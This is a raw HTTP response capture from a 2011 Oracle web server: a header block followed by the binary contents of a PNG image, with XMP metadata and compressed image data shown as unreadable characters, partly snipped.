HTTP/1.1 200 OK Last-Modified: Mon, 05 Sep 2011 21:01:53 GMT X-Robots-Tag: noindex,follow X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html Content-Language: en Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=3600+360;age=372;ecid=47465485677722335,0:1) Vary: Accept-Encoding Content-Length: 38457 Expires: Tue, 06 Sep 2011 16:12:52 GMT Date: Tue, 06 Sep 2011 16:12:52 GMT Connection: close .PNG . ...IHDR.......n.......J.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">...[SNIP]... </x:xmpmeta> <?xpacket end="r"?> _/V.....IDATx...i....-x...Sf..4"..... a..e4x.c.V.. x..W?.e....`Cy....v......U.]F....U.@..^#....H.f.MhV...S...>...[SNIP]... <...a{4.k...|..$*~..E...]..........b.V.x...%.o..=A*.....l`....`.^.v........[P{.........Fw..w.,...)....+...\.p..js.... [.....z...N<?...}.......}...p.z&v......U....L` `4T.P.B. x..P.[....S+{1.TQ ....[U.....;3.q....t........v.A.... }a....t.I..Fbi..w}.q..A.j.@...@y....n....FH.v.0.."=u.{...5..................i....A..C!..E....c..*..........K_.%.Q..Q2.$H..%.n.hZ......h.W.rN%.......A:..?.x......V....p....`...Q.i.C...o...}.^.0.....,.6...PxJ.>jR....V..w.....=...g.Ghx..v..d..e..v;.....f........m.?.1...c7F;w.............,$5S.........J...~.[~_./..h....'... .-...:@..h.P.B.:#....C...|z.....Cr.&.K.zo.:.....#.r|b...IO.f-.......A...W..2..'...{..\ C..^)W.S...a.N...Q.V.3f.6...IL3........X.._w..!.~....#.+k....,.<..wRZHL.)cU...\...../~..b..\......Lb...Z.O.?......1$",.(..E.......8.../.(...K.p.yQ......N..4.. Q. .|.......Q..t... ..WC..3....Mk.<........iQ...8$.:.<.d3...]pvv....+?0.G.|.k..-....}....D.R.v.o...'7..~...Q.....u..l.5....K.T.1._..[...E{2..70.....:..[....HV{. ..Q&. ..t....0.*T.P......J........ko.f..2..%."............!....yC..}(H...n....Vbo....2S..H'...K["..Br,...CG..N. #R;.. &&ae.$.F....#s....I.Q...y.K.S.E....t..n.$Q...g.r....(.$...3.?g.o.8.....V.k4..F.!..\~X'..}t.9g.V...8...O.G......{..g.l..~....^.2g</ m..E!.]..I #.YH...b. 9 ..&GI.7. .].C..q....../%......L.zUX.}...G>b.....c. J..._......{.....d..............hO.........v.u..Gw......j..s........L..II/S\}..a.t...*......BL..!@......d.....,J5..g&5..h.P.B.zM.Q..0wflq.f?.....L09.b.9vQ..fo..5$)....^&...K......Fin.vl?_O.z.x......mz.E.W.......`Z..R...SG.$!q.......jd..d.7....=....#'[qC.e....N....U#4....`.U.......V.NxT....'o|..r...|.5&..u.'c\...}.x.I/}..8. ..C.............x../{..h.K.J.P%S.[n..y. ....."c...5...O~.M|3..B'd,.L......{.|5..'...$..w..;k'..j......;..i.....gT.....k_.x.,V.........A....o..p....(...q../......|.>......o......G...7_2j.a.......o_....`Tf..K....o."WN......~.5.......... B%U.,"..Q.=. .|FC. .*T.......Vu!0....MZcSu.%.[\j..\Mo*.)L.~4.y......Qrn6.....%..}R(5....j.O.9T7....u,.n.F.na...).R...D....kq!k.c..+...X....3*!a.........W..O.n5...Z$.(..E...z#!$.. ..7.i.5{.....=...+......y...D3I...q\.q....?....6L.]=....H....'...;w...o.Yg...,...b.....c....>K..g..G.S..4jq..5.u.C..$%..dV...z9Rr..L..:.......}.. .~..X.......?..\l.........aC|....6....Y.-[..h*Q.f^.{.nN........}....;..=h.F...RM..........E..t[..._g..v...K<j.,.X.......3.3.mX.A..A?#.q.}.....`4T.P.B.ZJ. `....a.|..D.{.Xs..d(.b...#......{..m.'/...ge...T....6HT...,`...M.X..9V.k.. ...LK..E\#o.M.I$.&g.R.....]T.r...VRo.qm...d.t .q4.... .m&qZ.~^H\K.b....`.P4.....+....W..]?-....R5..g..........ZM"S...G......r.y..Jd..g.F.%k.67.....9JE. 4&p0F......6.z.6..s....sv...i.a\..j>l..;...4q...lS2.bvC..Oj...&..D@...tOo...n.v.. ..w.......o..7.k.......S.p=..>..'.w..o...)....>...N{..m...b~.`\|.9...e....O....|...}.z.)/.trR.Q/.^?.....HP.. t.&0.C.. ... .*T........>.xu..t#A..R.}.4 Kq......qj.zm....s..[....E.RD-...m\....$..%N'...+A.z......:W. .(...?|p ...p........r..wd.gig...$.8..f&....|..{...?...'.|7)..k.g.g.`...%..$.<g(IH..../_.GkP6X.f..E.zM`..............o"..g..B.....!.8....&...[.~....P.f.C..O%..:7..CppaZ...M..n..........@Q.ro.h~...p...v..A....E.. ..-........g..a..S..9.h.^...=h..a.X.......,3n....*.3b\.^..P.a.x.W..R....f..L+.....*T.P.%).....`......\HH.Q7Y...U#...N..$.........kE.U...a....r1....Bev.....Pd4J .....-EU1.3.W.@....i.:. .h..."+.......&W_........z.Q...Q.I.8>.j...q...Q..$q.2H..#.'Q....w....ZAwaQ..(...E.....sE.....E.L6Z.4..Yv`....p.Y...N6.u.%d\5...[....../.v......dber.A..p.z...4.(v.{...........B.s.p..el..d..ma.e...."{..H..e..A..=..pr9. .0v..'&.#"..{.VV..K.2.?\.#.....&+...PXQ.r....w......0.*T.P.^sf..H..m..W..\P.d......FIk.b..~...P.|..y..6.R8..W..%...V.7...k.3sK..,{....z...D.D.~jtSj...JX.2.......|b...l..u..$"qB.z.7...+.W.bRc<......i....%q. .bj..W.....X.N.....SSM..={.n7X...b..M.Otz..'.w...l...7^.N>.d.. 5Uj@...C.........B9..R...#D.. ..t3.h.Qu..z..N./.....-.9.B.........p.I.}(....?.8...\,w.T....`yx...rZ..0./*.J.2..Y.....G.....M....q..8....3..B. ..5fFE.....H'wGw:&.<.68..r.7t\.M..O.6..%.....UH..E.^ !w.G\..3..U.I.<.B.t..gS...B....X...fM"H.!.A}n...I^.qT.k.F...$.4.I....5k.6...:..}........,...&.6..;......K...uk'7.3;95.....t.....}.O..;......d...........9....L..q...$.c...@.u....+./1..pG..x .X....%h.[...Dx..fzTA/Lt...P._V. .......%..cpb....WHy.+.X..U..W...+..H....6<"...[.....fK.;.N..6.Yk.......W..{....5}..h...B. .*.....E...F.T..p0..H...u.Q.V5X..".e/l....e{.*\.. ....f.b.U.:+^3T.....6i....s.U.=...o./.`.].b...wJ0..N....mD1M.8.Y.aB.Mr....... .j...........'.m\...g...7.....F}RO.*(K.l.9......k..Y........9.kW.]........h...g.& .....N.p....4/8.....{..Q.F....(...v.)........>1..Z.S.=H....G...`.b....v&......./..W.E.p.....8.bn.-G...y ...X........:.e......w......t).0.*\.)@O..f.3...\........J.e. ...0...Eu._;Q..X`.i.9..f4T.P.B.zu~..E.....J*....v.:...ym..n.L.o......4...#;$*..t........27...ch. ....e.Z.rEDb..9.........V2?.........p.7....U.%..F.GQ..Gs..........?{..g?..?x.;.,.bwn..}.8.4..P.&.q...+....lq~|..........-o...I..z.....&c..Fw.X...._.:.......8dp.D.Y.N.uXVD..1m.k .s.;...`4...~. 2....q.w..x.{........^Q..U..vs...;..{..O<......#<=.R...2..\.i.....E..N..........UH.../.S.R....w...h.P.B. .NG..,/u.\.......L.^g.{a.....-..TA....5......3v._.YMl.B...p......}p}^/..iC.^..y.&r.$fn...s(J.^.)EE..VMP.......b.j4.<o...........=.n............3....x......9. Y...\u".}e..c.....Z.v.;...y9.#.S$.y....&..........L'y.....PVq.s'...aMb.(j6k4.J.$wC.D...4z&nI9.......X....U^..i~...e<...\a1.y.N.r...~..?z..WP.}.8`.u..r0....r.#.pc.. 9.~,..P)..K@.w}.Q.....5+"...5=..b..<)...1K^.%y`....NP|&.....*T.Pg.9j..D;.. 8.....-.x$C.n..g..D...b). .;...T..6-.2`..}..&".Ojf...&ghaQ...S.E.....X...k..b7M"". ...&1.. .6.:..F.q..._t...G.` R............m..........t.........ho#J%.[w...........Y6>Y?rrq..[.iCg1.....'..I0yr.7.n..3.e.q6..d{.F....,+ e..%......'q,.M,13*.........9`...@.........|d.#....}.l.\J...V.#.....K.T=Y...|....^.k.....;.....B.*.....`p^......9..P....`vV...w....... .*T.P.....Z..a'...&e:....L.(..,....Z8.J...,.5+-sF.i.;Z.U.U5a..l.. AnJ..,..G.^4....&.V....r<.H....Of.c..x...QLI.E.....h..f(y...Z..O?............|..............N.....}...I...=...W.].UB....F...i'..3._..o....:m.['.33...^7. .1. B...i..x('..p.i......&..T..7......E0....f{j.Y..#d....4............}...%...+...dE...K...[..........kb..r28.o3..\....\e.W...|o1.......hL\.....G.~.B.:....#..L..0.*T.P.B.......8......I.O2..Z.ml..t.I....U...>....\8..r.A.Cj.R..Q.v.'.A......:&....t.... ...T.v.9..z.zBH...D...X.xw8....H.... [. "...a..0.#.s.....3.7.x._t.../............^~.......O...............$.1...7b...G:.V..V.....{.tz.^......h..$...f...".3<.Y..r[.B4.....q..Clg...q3.D...Y.+..U..K##7......l.5|.j......?..m..K6C...N.s........z../..b'.,.i.s.J.B.....D.6.v...R"V.d..=.|..+.o.P.............1..&.`;Bk f...Y.'6...=.... .*T.P...eZ......p.&,.IL..Xb.i}...U...g.+..Fs....`.......:...N.j.`.3ba..8,....*f*S3....r..Li...\4.I...::..O..v.....Tn(.$..ED.$.H.sm...o.)9..u..{.~.....~ -.+.}_..?..wb....5[.7.=k.....P.H.E..|..Wo..;.!2.M.y......v.....TF...jzT...u....q.......z...Ln....63.'.QC"u...6 x....D.<.;.@.{D..v....u....,{.- ..l".S_j..(....QS.>>.....t..^x...D.(.K/....0.&....c....g$.=M&.....,.C.v..|&G....l]...B. .*.i.Q.s.....W...d....'...|6.....X..K....>.....BL.....Z4<.0..~.8<....:.T....F.I3.2V..7c...MOM.r.{.h........Z-.D!......D*....E..M....V..C......E..Z..N./.4.z....+..c..$............1.....}'7m.~.[6.I.*.%....l0L......5]...F.F(..:s'...j$.U.j...<7l.......3..hR..]..C..W.;.....\..2.6...._...N..y...{.".b..m.Zf......a....7